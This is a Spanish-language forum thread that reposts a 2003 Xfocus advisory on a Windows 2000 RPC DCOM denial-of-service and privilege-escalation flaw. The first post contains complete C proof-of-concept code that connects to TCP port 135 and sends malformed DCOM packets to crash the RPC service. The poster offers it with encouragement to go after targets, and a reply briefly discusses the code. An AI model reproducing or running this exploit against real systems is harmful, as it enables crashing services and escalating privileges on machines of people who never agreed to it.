Resultados 1 al 2 de 2

Win2k (esclar privilegios)

  1. #1 Win2k (esclar privilegios) 
    Avanzado
    Fecha de ingreso
    Dec 2001
    Ubicación
    BCN
    Mensajes
    469
    Descargas
    0
    Uploads
    0
    He encontrado una paguina interesante, que avisa de una importante vulnerabilidad de win2k que puede permitir control total de la maquina. La noticia en ingles es:

    Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability

    Create: 2003-07-25
    Author: flashsky (flashsky1_at_sina.com)

    1.Description:
    There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results because of incorrect handling of malformed messages.
    By sending a malformed messages to DCOM __RemoteGetClassObject interface,The RPC Service will be crashed,and all service and application depending on RPC service will be abnormal.
    If attacker have an account ,he can hijack epmapper pipe and 135 port Privilege Escalation after RPC service is crash.

    2.Affected Systems:Windows 2000 +SP3
    Windows 2000 +SP4+

    3.Proof of concept codes:


    #include <winsock2.h>
    #include <stdio.h>
    #include <windows.h>
    #include <process.h>
    #include <string.h>
    #include <winbase.h>

    unsigned char bindstr[]={
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00, 0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00, 0x00,0x00,0x01,0x00,0x01,0x00,
    0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00, 0x00,0x00,0x00,0x00,0x00,0x46,
    0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C, 0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

    unsigned char request[]={
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00, 0x00,0x00,0x13,0x00,0x00,0x00,
    0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00, 0x06,0x01,0x00,0x00,0x00,0x00,
    0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31, 0x31,0x31,0x31,0x31,0x31,0x31,
    0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31, 0x31,0x31,0x31,0x31,0x31,0x31,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};



    void main(int argc,char ** argv)
    {
    WSADATA WSAData;
    int i;
    SOCKET sock;
    SOCKADDR_IN addr_in;

    short port=135;
    unsigned char buf1[0x1000];
    printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
    printf("Code by FlashSky,[email protected],benjurry,benjurry@xfo cus.org\n");
    printf("Welcome to http://www.xfocus.net\n");
    if(argc<2)
    {
    printf("useage:%s target\n",argv[0]);
    exit(1);
    }


    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
    printf("WSAStartup error.Error:%d\n",WSAGetLastError());
    return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==I NVALID_SOCKET)
    {
    printf("Socket failed.Error:%d\n",WSAGetLastError());
    return;
    }
    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==S OCKET_ERROR)
    {
    printf("Connect failed.Error:%d",WSAGetLastError());
    return;
    }
    if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERRO R)
    {
    printf("Send failed.Error:%d\n",WSAGetLastError());
    return;
    }

    i=recv(sock,buf1,1024,MSG_PEEK);
    if (send(sock,request,sizeof(request),0)==SOCKET_ERRO R)
    {
    printf("Send failed.Error:%d\n",WSAGetLastError());
    return;
    }
    i=recv(sock,buf1,1024,MSG_PEEK);
    }
    5.About XFOCUS.ORG
    Xfocus is a non-profit and free technology organization which was founded in 1998 in China. We are devoting to research and demonstration of weaknesses related to network services and communication security.
    We hope that we can use new technical tools to achieve our goal, and to broaden our outlook. We also hope we can communicate and help with each other through this amazing Internet.
    This site is created for publishing some documents , codes and utilities of our research work. Any suggestions are welcome , please contact us at webmaster_at_xfocus.org .
    From the Internet. For the Internet. Have fun!


    No seais muy malos. y a por ellos que son pocos!!!
    La resitencia es futil, todos sereis asimilados.
    NeoGenessis
    Citar  
     

  2. #2  
    Medio
    Fecha de ingreso
    Jul 2003
    Ubicación
    Riverdel
    Mensajes
    56
    Descargas
    0
    Uploads
    0
    No he estudiado el codigo, pero parece que lo que haces es acceder alguno de los servicios de los puertos TCP o UDP con sockets, pero por otro lado parece que es para ejecutarse directamente en la maquina local.
    Ya podian estar los comentarios en el idioma de Cervantes.
    Citar  
     

Temas similares

  1. Instalacion de Win2k Server
    Por pistacho en el foro HARDWARE
    Respuestas: 5
    Último mensaje: 24-02-2004, 13:42
  2. Numero de Serie para Win2k Server
    Por LaHormiga en el foro INGENIERIA INVERSA
    Respuestas: 1
    Último mensaje: 29-05-2003, 04:21
  3. red win2k
    Por jocanor en el foro HARDWARE
    Respuestas: 1
    Último mensaje: 05-05-2003, 20:41
  4. reventando win2k
    Por el_satri en el foro INGENIERIA INVERSA
    Respuestas: 3
    Último mensaje: 15-08-2002, 20:13
  5. tcp/ip en win2k
    Por defcondos en el foro GENERAL
    Respuestas: 8
    Último mensaje: 22-04-2002, 22:32

Marcadores

Marcadores